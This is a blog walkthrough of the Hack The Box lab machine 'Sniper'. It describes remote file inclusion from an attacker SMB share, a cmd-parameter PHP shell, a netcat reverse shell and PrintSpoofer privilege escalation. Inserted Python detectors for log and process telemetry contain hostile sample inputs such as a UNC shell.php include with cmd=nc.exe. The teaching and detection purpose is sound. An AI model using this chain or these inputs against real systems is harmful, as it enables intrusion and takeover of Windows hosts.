Monday, May 30, 2022

HTB Walkthrough - Sniper

Over the weekend I worked on the box: Sniper.

Let’s dive in right away on how I did it!


NOTE: This is not meant to be a tutorial but rather a walkthrough on how I did it.


Let’s start pwning the awesome box

The IP address of the box is: 10.10.10.151


As with every other pentesting and pwning methodology, let’s start with a simple nmap scan of the box (10.10.10.151):



As we can see, we have the SMB ports, the NFS port and the HTTP ports open.

The HTTP port looks like the most prominent one, so let's dive into that!


After looking through the (not so interesting) main page, I decide to run gobuster against it to enumerate the interesting directories.



Gobuster gives us a list of interesting directories; /user and /blog are the ones also linked from the home page, so I decided to check them out.


I wander through the /user part of the site for a long time, as it presents what seems like a hackable login page. However, I couldn’t log in or find any kind of vulnerability in it.



So, I give up on this part of the site and move on to look at /blog.


As soon as I visit /blog, I find something interesting. It seems like an LFI! However, when I try to include pages/files from other directories, it fails.



After a while, however, I remember that ports 139 & 445 are open! That means I can possibly include files from an open SMB share. I do just that: I place a simple shell.php in my SMB share and try to require that file through the link, and it works! So, I place netcat (nc.exe) in my SMB share and try to run it through shell.php.


The simple shell.php just executes commands taken from the cmd GET request parameter.
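The detail worth remembering from this step, from the defender's side, is that PHP on Windows treats a UNC path such as \\host\share\file.php as a plain filesystem path, so setting allow_url_include=Off does not stop an include parameter from pulling code off an attacker's SMB share; the fixes are an allowlist of includable pages in the application and blocking outbound SMB (139/445) from the web server. The following detection logic is an added example, not code from the box or from this post: it scans IIS-style W3C web log lines for include parameters carrying UNC paths, directory traversal or stream wrappers. The log lines, the `lang` parameter name and the 10.10.14.x client addresses are constructed for illustration.

```python
"""Flag file-inclusion attempts (UNC/SMB paths, traversal, stream wrappers)
in IIS W3C-style web logs.

Added example for this walkthrough; not code from the box or its author.
The log lines, the ``lang`` parameter name and the 10.10.14.x client
addresses are constructed for illustration.
"""
import re
from urllib.parse import parse_qsl

# Constructed IIS-style log lines.  Fields: date time c-ip cs-method
# cs-uri-stem cs-uri-query sc-status.  "-" means no query string.
SAMPLE_LOG = r"""
2022-05-29 14:02:11 10.10.14.5 GET /blog/ lang=blog-en.php 200
2022-05-29 14:03:40 10.10.14.5 GET /blog/ lang=..\..\windows\win.ini 200
2022-05-29 14:05:02 10.10.14.5 GET /blog/ lang=\\10.10.14.5\share\shell.php&cmd=whoami 200
2022-05-29 14:05:30 10.10.14.5 GET /blog/ lang=%5c%5c10.10.14.5%5cshare%5cshell.php&cmd=nc.exe 200
2022-05-29 14:06:00 10.10.14.9 GET /user/ - 200
""".strip().splitlines()

# Rule name -> pattern applied to each percent-decoded parameter value.
RULES = {
    # \\host\share\file or //host/share/file: PHP on Windows treats these as
    # local filesystem paths, so allow_url_include=Off does not block them.
    "unc_path": re.compile(r"^\s*(\\\\|//)[^\\/]+[\\/]"),
    # ../ or ..\ anywhere in the value.
    "traversal": re.compile(r"\.\.[\\/]"),
    # php://, data:, http://, or an absolute drive path such as c:\.
    "wrapper_or_abs": re.compile(r"^\s*[a-zA-Z][a-zA-Z0-9+.\-]*:"),
}


def parse_line(line):
    """Split one W3C-style line into a dict; returns None for malformed lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, client, method, stem, query, status = parts
    params = [] if query == "-" else parse_qsl(query, keep_blank_values=True)
    return {"time": f"{date} {time}", "client": client, "method": method,
            "stem": stem, "params": params, "status": status}


def classify_value(value):
    """Return the first rule name the (already decoded) value matches, or None."""
    for name, pattern in RULES.items():
        if pattern.search(value):
            return name
    return None


def scan_log(lines):
    """Return one finding per (line, parameter) that trips a rule."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in rec["params"]:
            rule = classify_value(value)
            if rule:
                findings.append({"line": lineno, "client": rec["client"],
                                 "stem": rec["stem"], "param": key,
                                 "value": value, "rule": rule})
    return findings


def clients_by_findings(findings):
    """Count findings per client address, most active first."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"line {f['line']}: {f['client']} {f['stem']} "
              f"{f['param']}={f['value']!r} -> {f['rule']}")
    print(clients_by_findings(hits))
```

The percent-encoded variant on the fourth line is caught because parse_qsl decodes the value before the rules run; a rule set applied to the raw query string would miss it. The wrapper rule also fires on a bare drive letter, which is intended: neither c:\ nor php:// belongs in a page-selector parameter.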



This gives me the initial shell! Hurray!!!



As we can see, I got the reverse shell. Also, from the name of my user, ‘iusr’, I happen to be a service user. So, I check my privileges, and I do have all the service privileges.

I think of using one of the potato exploits, but as the operating system I’m on is Windows Server 2019, they might not be effective on this machine. Hence, I resort to the newer priv esc exploit, PrintSpoofer.


I move PrintSpoofer into my SMB share and try to get another reverse shell by executing nc.exe. Also note that I couldn’t create any files anywhere on the system as it kept giving me access denied; therefore I only used my open SMB share and did not place any files anywhere on the system (good hiding & no footprints!).
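"No footprints" holds for the disk, but not for process-creation telemetry: a binary run straight from an SMB share shows up with a \\host\share image path, the web service account is seen spawning a shell and netcat, and the PrintSpoofer step produces a process running as SYSTEM whose creator ran as a low-privilege account. The hunt below is an added example, not code from the box or from this post. The events are constructed dicts loosely modelled on Security event 4688 fields (subject account, creator process, new process, target account); the real 4688 layout and field names vary by Windows version and the php-cgi.exe parent is an assumption about how PHP is hosted, so adapt the field mapping to your own collector.

```python
"""Hunt Windows process-creation telemetry for the pivots in this walkthrough:
a web service account spawning shells/netcat, images executed from an SMB
share, and a SYSTEM process created by a low-privilege account.

Added example, not from the box or its author.  EVENTS are constructed and
only loosely modelled on Security event 4688; field names are assumptions.
"""
import ntpath
from collections import defaultdict

# Assumption: accounts the web tier runs as (compared case-insensitively).
WEB_SERVICE_ACCOUNTS = {"IUSR", "DEFAULTAPPPOOL", "NETWORK SERVICE"}
SHELL_LIKE = {"cmd.exe", "powershell.exe", "nc.exe", "nc64.exe"}
PRIVILEGED = {"SYSTEM", "LOCALSYSTEM"}

# Constructed events: 10.10.14.5 stands in for the attacker's SMB share,
# php-cgi.exe for the PHP worker, alice for an ordinary interactive user.
EVENTS = [
    {"ts": "14:05:02", "subject": "iusr", "parent": "php-cgi.exe",
     "process": r"C:\Windows\System32\cmd.exe", "target": "iusr"},
    {"ts": "14:05:03", "subject": "iusr", "parent": "cmd.exe",
     "process": r"\\10.10.14.5\share\nc.exe", "target": "iusr"},
    {"ts": "14:20:10", "subject": "iusr", "parent": "cmd.exe",
     "process": r"\\10.10.14.5\share\PrintSpoofer.exe", "target": "iusr"},
    {"ts": "14:20:11", "subject": "iusr", "parent": "PrintSpoofer.exe",
     "process": r"\\10.10.14.5\share\nc.exe", "target": "SYSTEM"},
    {"ts": "14:21:00", "subject": "SYSTEM", "parent": "services.exe",
     "process": r"C:\Windows\System32\svchost.exe", "target": "SYSTEM"},
    {"ts": "14:22:00", "subject": "alice", "parent": "explorer.exe",
     "process": r"C:\Windows\System32\cmd.exe", "target": "alice"},
]


def basename(path):
    """Lower-cased image file name from a Windows path (works for UNC paths)."""
    return ntpath.basename(path).lower()


def check_event(ev):
    """Return the list of rule names one event trips (possibly empty)."""
    hits = []
    subject = ev["subject"].upper()
    target = ev["target"].upper()
    if subject in WEB_SERVICE_ACCOUNTS and basename(ev["process"]) in SHELL_LIKE:
        hits.append("web_account_shell")       # web tier should never spawn these
    if ev["process"].startswith("\\\\"):
        hits.append("unc_image")               # executed from a share: nothing on local disk
    if target in PRIVILEGED and subject not in PRIVILEGED:
        hits.append("privilege_jump")          # created as SYSTEM by a non-SYSTEM creator
    return hits


def hunt(events):
    """Run every rule over every event and flatten the results."""
    findings = []
    for i, ev in enumerate(events):
        for rule in check_event(ev):
            findings.append({"index": i, "ts": ev["ts"], "subject": ev["subject"],
                             "parent": ev["parent"], "process": ev["process"],
                             "rule": rule})
    return findings


def chains_by_account(findings):
    """Group findings per subject account so the whole pivot reads as one chain."""
    chains = defaultdict(list)
    for f in findings:
        chains[f["subject"].upper()].append(
            (f["ts"], f["parent"], basename(f["process"]), f["rule"]))
    return dict(chains)


if __name__ == "__main__":
    for account, steps in chains_by_account(hunt(EVENTS)).items():
        print(account)
        for ts, parent, image, rule in steps:
            print(f"  {ts}  {parent} -> {image}  [{rule}]")
```

The single strongest signal here is the privilege_jump rule: a legitimate service never needs a process created under IUSR to come out running as SYSTEM, so that one event is worth an alert on its own, while unc_image and web_account_shell are the context that turns it into a readable chain.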



So I got SYSTEM access in my listening nc.



Boom! One system down!


When I looked online after I pwned the box, it seems there were also multiple other ways of pwning it besides straight-up abusing the service privileges. However, I (by luck) did the simplest one! Looking forward to pwning other boxes.

